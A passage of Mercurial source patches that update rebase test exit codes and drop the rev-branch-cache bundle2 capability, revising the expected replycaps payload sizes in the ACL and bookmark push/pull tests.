Rebase - generate a conflict: diff --git a/tests/test-rebase-named-branches.t b/tests/test-rebase-named-branches.t --- a/tests/test-rebase-named-branches.t +++ b/tests/test-rebase-named-branches.t @@ -247,7 +247,7 @@ $ hg rebase -s 5 -d 6 abort: source and destination form a cycle - [255] + [10] $ hg rebase -s 6 -d 5 rebasing 6:3944801ae4ea "dev-two named branch" diff --git a/tests/test-rebase-newancestor.t b/tests/test-rebase-newancestor.t --- a/tests/test-rebase-newancestor.t +++ b/tests/test-rebase-newancestor.t @@ -154,7 +154,7 @@ rebasing 2:ec2c14fb2984 "dev: f-dev stuff" rebasing 4:4b019212aaf6 "dev: merge default" abort: rebasing 4:4b019212aaf6 will include unwanted changes from 1:1d1a643d390e - [255] + [10] $ cd .. @@ -314,7 +314,7 @@ rebasing 6:b296604d9846 E "E" rebasing 7:caa9781e507d F tip "F" abort: rebasing 7:caa9781e507d will include unwanted changes from 4:d6003a550c2c or 3:c1e6b162678d - [255] + [10] The warning does not get printed if there is no unwanted change detected: diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete.t @@ -560,7 +560,7 @@ rebasing 2:b18e25de2cf5 D "D" rebasing 6:f15c3adaf214 F tip "F" abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [255] + [10] $ cd .. 
@@ -948,7 +948,7 @@ $ hg rebase -s 10 -d 12 abort: this rebase will cause divergences from: 121d9e3bc4c6 (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] + [20] $ hg log -G @ 14:73568ab6879d bar foo | @@ -1152,7 +1152,7 @@ $ hg rebase -r 'c'::'f' -d 'x' abort: this rebase will cause divergences from: 76be324c128b (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] + [20] $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' rebasing 3:a82ac2b38757 c "c" rebasing 4:76be324c128b d "d" @@ -1566,7 +1566,7 @@ $ hg rebase -b 'desc("D")' -d 'desc("J")' abort: this rebase will cause divergences from: 112478962961 (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] + [20] Rebase merge where both parents have successors in destination @@ -1585,7 +1585,7 @@ note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" rebasing 7:dac5d11c5a7d E tip "E" abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [255] + [10] $ cd .. Rebase a non-clean merge. 
One parent has successor in destination, the other @@ -1941,7 +1941,7 @@ $ hg rebase --stop abort: cannot remove original changesets with unrebased descendants (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [255] + [20] $ hg rebase --abort saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg rebase aborted @@ -2020,7 +2020,7 @@ [240] $ hg rebase --stop abort: cannot stop in --collapse session - [255] + [20] $ hg rebase --abort rebase aborted $ hg diff diff --git a/tests/test-rebase-parameters.t b/tests/test-rebase-parameters.t --- a/tests/test-rebase-parameters.t +++ b/tests/test-rebase-parameters.t @@ -66,7 +66,7 @@ $ hg rebase --continue --collapse abort: cannot use collapse with continue or abort - [255] + [10] $ hg rebase --continue --dest 4 abort: cannot specify both --continue and --dest @@ -94,15 +94,15 @@ $ hg rebase --rev 'wdir()' --dest 6 abort: cannot rebase the working copy - [255] + [10] $ hg rebase --source 'wdir()' --dest 6 abort: cannot rebase the working copy - [255] + [10] $ hg rebase --source 1 --source 'wdir()' --dest 6 abort: cannot rebase the working copy - [255] + [10] $ hg rebase --source '1 & !1' --dest 8 empty "source" revision set - nothing to rebase @@ -508,11 +508,11 @@ $ hg rebase -i abort: interactive history editing is supported by the 'histedit' extension (see "hg --config extensions.histedit= help -e histedit") - [255] + [10] $ hg rebase --interactive abort: interactive history editing is supported by the 'histedit' extension (see "hg --config extensions.histedit= help -e histedit") - [255] + [10] $ cd .. 
diff --git a/tests/test-rebase-scenario-global.t b/tests/test-rebase-scenario-global.t --- a/tests/test-rebase-scenario-global.t +++ b/tests/test-rebase-scenario-global.t @@ -266,14 +266,14 @@ $ hg rebase -s 5 -d 6 abort: source and destination form a cycle - [255] + [10] G onto B - merge revision with both parents not in ancestors of target: $ hg rebase -s 6 -d 1 rebasing 6:eea13746799a "G" abort: cannot rebase 6:eea13746799a without moving at least one of its parents - [255] + [10] $ hg rebase --abort rebase aborted # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1614891535 -3600 # Thu Mar 04 21:58:55 2021 +0100 # Node ID 7015b0232c5ea9666e621f7051a744d07a24f7b9 # Parent 9989a276712fe845513461aceb44073a68bc4c49 exchange: stop advertising rev-branch-cache bundle capability Since Mercurial 5.7, the corresponding bundle part is ignored as redundant. Stop advertising it so that peers don't have to spend time creating or transferring it. Differential Revision: https://phab.mercurial-scm.org/D10114 diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -1598,7 +1598,6 @@ b'digests': tuple(sorted(util.DIGESTS.keys())), b'remote-changegroup': (b'http', b'https'), b'hgtagsfnodes': (), - b'rev-branch-cache': (), b'phases': (b'heads',), b'stream': (b'v2',), } @@ -1643,6 +1642,9 @@ # Else always advertise support on client, because payload support # should always be advertised. + # b'rev-branch-cache' is no longer advertised, but still supported + # for legacy clients.
+ return caps diff --git a/tests/common-pattern.py b/tests/common-pattern.py --- a/tests/common-pattern.py +++ b/tests/common-pattern.py @@ -20,7 +20,6 @@ br'phases%253Dheads%250A' br'pushkey%250A' br'remote-changegroup%253Dhttp%252Chttps%250A' - br'rev-branch-cache%250A' br'stream%253Dv2', # (the replacement patterns) br'$USUAL_BUNDLE_CAPS$', @@ -53,7 +52,6 @@ br'phases%3Dheads%0A' br'pushkey%0A' br'remote-changegroup%3Dhttp%2Chttps%0A' - br'rev-branch-cache%0A' br'stream%3Dv2', # (replacement patterns) br'$USUAL_BUNDLE2_CAPS$', @@ -70,8 +68,7 @@ br'listkeys%0A' br'phases%3Dheads%0A' br'pushkey%0A' - br'remote-changegroup%3Dhttp%2Chttps%0A' - br'rev-branch-cache', + br'remote-changegroup%3Dhttp%2Chttps', # (replacement patterns) br'$USUAL_BUNDLE2_CAPS_SERVER$', ), @@ -85,7 +82,6 @@ br'listkeys%0A' br'pushkey%0A' br'remote-changegroup%3Dhttp%2Chttps%0A' - br'rev-branch-cache%0A' br'stream%3Dv2', # (replacement patterns) br'$USUAL_BUNDLE2_CAPS_NO_PHASES$', diff --git a/tests/test-acl.t b/tests/test-acl.t --- a/tests/test-acl.t +++ b/tests/test-acl.t @@ -109,14 +109,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -175,14 +175,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: 
"HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -245,14 +245,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -325,14 +325,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: 
with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -395,14 +395,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -470,14 +470,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -542,14 +542,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 
bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -619,14 +619,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -693,14 +693,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload 
bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -766,7 +766,7 @@ list of changesets: ef1ea85a6374b77d6da9dcda9541f498f2d17df7 bundle2-output-bundle: "HG20", 7 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:bookmarks" 37 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload @@ -775,7 +775,7 @@ bundle2-output-part: "bookmarks" 37 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:bookmarks" supported bundle2-input-part: total payload size 37 bundle2-input-part: "check:phases" supported @@ -856,7 +856,7 @@ list of changesets: ef1ea85a6374b77d6da9dcda9541f498f2d17df7 bundle2-output-bundle: "HG20", 7 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:bookmarks" 37 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload @@ -865,7 +865,7 @@ bundle2-output-part: "bookmarks" 37 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:bookmarks" supported bundle2-input-part: total payload size 37 bundle2-input-part: "check:phases" supported @@ -946,14 +946,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 
5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1033,14 +1033,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1116,14 +1116,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: 
with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1194,14 +1194,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1283,14 +1283,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1374,14 +1374,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 
911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1461,14 +1461,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1543,14 +1543,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload 
bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1631,14 +1631,14 @@ f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd 911600dab2ae7a9baff75958b84fe606851ce955 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 24 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 24 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 24 bundle2-input-part: "check:updated-heads" supported @@ -1753,14 +1753,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -1840,14 +1840,14 @@ 
911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -1918,14 +1918,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -1992,14 +1992,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" 
(params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2060,14 +2060,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2152,14 +2152,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: 
"check:updated-heads" supported @@ -2243,14 +2243,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2316,14 +2316,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported @@ -2401,14 +2401,14 @@ 911600dab2ae7a9baff75958b84fe606851ce955 e8fc755d4d8217ee5b0c2bb41558c40d43b92c01 bundle2-output-bundle: "HG20", 5 parts total - bundle2-output-part: "replycaps" 224 bytes payload + bundle2-output-part: "replycaps" 207 bytes payload bundle2-output-part: "check:phases" 48 bytes payload bundle2-output-part: "check:updated-heads" 
streamed payload bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload bundle2-output-part: "phase-heads" 48 bytes payload bundle2-input-bundle: with-transaction bundle2-input-part: "replycaps" supported - bundle2-input-part: total payload size 224 + bundle2-input-part: total payload size 207 bundle2-input-part: "check:phases" supported bundle2-input-part: total payload size 48 bundle2-input-part: "check:updated-heads" supported diff --git a/tests/test-bookmarks-pushpull.t b/tests/test-bookmarks-pushpull.t --- a/tests/test-bookmarks-pushpull.t +++ b/tests/test-bookmarks-pushpull.t @@ -129,10 +129,10 @@ bundle2-output: bundle parameter: bundle2-output: start of parts bundle2-output: bundle part: "replycaps" - bundle2-output-part: "replycaps" 241 bytes payload + bundle2-output-part: "replycaps" 224 bytes payload bundle2-output: part 0: "REPLYCAPS" bundle2-output: header chunk size: 16 - bundle2-output: payload chunk size: 241 + bundle2-output: payload chunk size: 224 bundle2-output: closing payload chunk bundle2-output: bundle part: "check:bookmarks" bundle2-output-part: "check:bookmarks" 23 bytes payload @@ -162,9 +162,9 @@ bundle2-input: part parameters: 0 bundle2-input: found a handler for part replycaps bundle2-input-part: "replycaps" supported - bundle2-input: payload chunk size: 241 + bundle2-input: payload chunk size: 224 bundle2-input: payload chunk size: 0 - bundle2-input-part: total payload size 241 + bundle2-input-part: total payload size 224 bundle2-input: part header size: 22 bundle2-input: part type: "CHECK:BOOKMARKS" bundle2-input: part id: "1" @@ -241,10 +241,10 @@ bundle2-output: bundle parameter: bundle2-output: start of parts bundle2-output: bundle part: "replycaps" - bundle2-output-part: "replycaps" 241 bytes payload + bundle2-output-part: "replycaps" 224 bytes payload bundle2-output: part 0: "REPLYCAPS" bundle2-output: header chunk size: 16 - bundle2-output: payload chunk size: 241 + bundle2-output: payload chunk size: 224 
